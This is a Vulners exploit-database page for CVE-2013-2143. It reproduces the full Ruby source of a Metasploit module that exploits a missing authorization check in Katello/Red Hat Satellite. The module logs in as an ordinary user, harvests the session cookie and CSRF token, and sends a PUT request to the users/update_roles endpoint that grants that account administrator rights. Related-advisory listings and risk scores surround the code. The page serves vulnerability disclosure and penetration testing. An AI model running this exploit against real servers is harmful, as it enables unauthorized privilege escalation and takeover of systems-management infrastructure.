Vulners
Lucene search
Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Katello (Red Hat Satellite) users/update_roles Missing Authorization | 26 Mar 201400:00 | – | zdt |
 | CVE-2013-2143 | 26 Mar 201400:00 | – | circl |
 | Katello update_roles Privilege Escalation (CVE-2013-2143) | 29 May 201400:00 | – | checkpoint_advisories |
 | CVE-2013-2143 | 17 Apr 201414:00 | – | cve |
 | CVE-2013-2143 | 17 Apr 201414:00 | – | cvelist |
 | Katello (Red Hat Satellite) users/update_roles Missing Authorization | 25 Mar 201402:44 | – | metasploit |
 | CVE-2013-2143 | 17 Apr 201414:55 | – | nvd |
 | Katello (Red Hat Satellite) users/update_roles Missing Authorization | 25 Mar 201400:00 | – | packetstorm |
 | Authorization | 17 Apr 201414:55 | – | prion |
 | Privilege Escalation | 28 Mar 201707:16 | – | veracode |
10
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization',
'Description' => %q{
This module exploits a missing authorization vulnerability in the
"update_roles" action of "users" controller of Katello and Red Hat Satellite
(Katello 1.5.0-14 and earlier) by changing the specified account to an
administrator account.
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-2143'],
['CWE', '862']
],
'DisclosureDate' => 'Mar 24 2014'
)
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Your username']),
OptString.new('PASSWORD', [true, 'Your password']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
], self.class
)
end
def run
print_status("Logging into #{target_url}...")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'user_session', 'new'),
'vars_get' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)
if res.nil?
print_error('No response from remote host')
return
end
if res.headers['Location'] =~ /user_session\/new$/
print_error('Authentication failed')
return
else
session = $1 if res.get_cookies =~ /_katello_session=(\S*);/
if session.nil?
print_error('Failed to retrieve the current session')
return
end
end
print_status('Retrieving the CSRF token for this session...')
res = send_request_cgi(
'cookie' => "_katello_session=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'dashboard')
)
if res.nil?
print_error('No response from remote host')
return
end
if res.headers['Location'] =~ /user_session\/new$/
print_error('Authentication failed')
return
else
session = $1 if res.get_cookies =~ /_katello_session=(\S*);/
if session.nil?
print_error('Failed to retrieve the current session')
return
end
end
if res.headers['Location'] =~ /user_session\/new$/
print_error('Failed to retrieve the user id')
return
else
csrf_token = $1 if res.body =~ /<meta[ ]+content="(\S*)"[ ]+name="csrf-token"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(\S*)"[ ]*\/?>/i if csrf_token.nil?
if csrf_token.nil?
print_error('Failed to retrieve the CSRF token')
return
end
user = $1 if res.body =~ /\/users.(\d+)#list_search=#{datastore['USERNAME']}/
if user.nil?
print_error('Failed to retrieve the user id')
return
end
end
print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...")
res = send_request_cgi(
'cookie' => "_katello_session=#{session}",
'headers' => {
'X-CSRF-Token' => csrf_token
},
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'),
'vars_post' => {
'user[role_ids][]' => '1'
}
)
if res.nil?
print_error('No response from remote host')
return
end
if res.headers['X-Message-Type'] =~ /success$/
print_good('User updated successfully')
else
print_error('Failed to update user')
end
end
def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Mar 2014 00:00Current
7High risk
Vulners AI Score7
CVSS 26.5
EPSS0.61472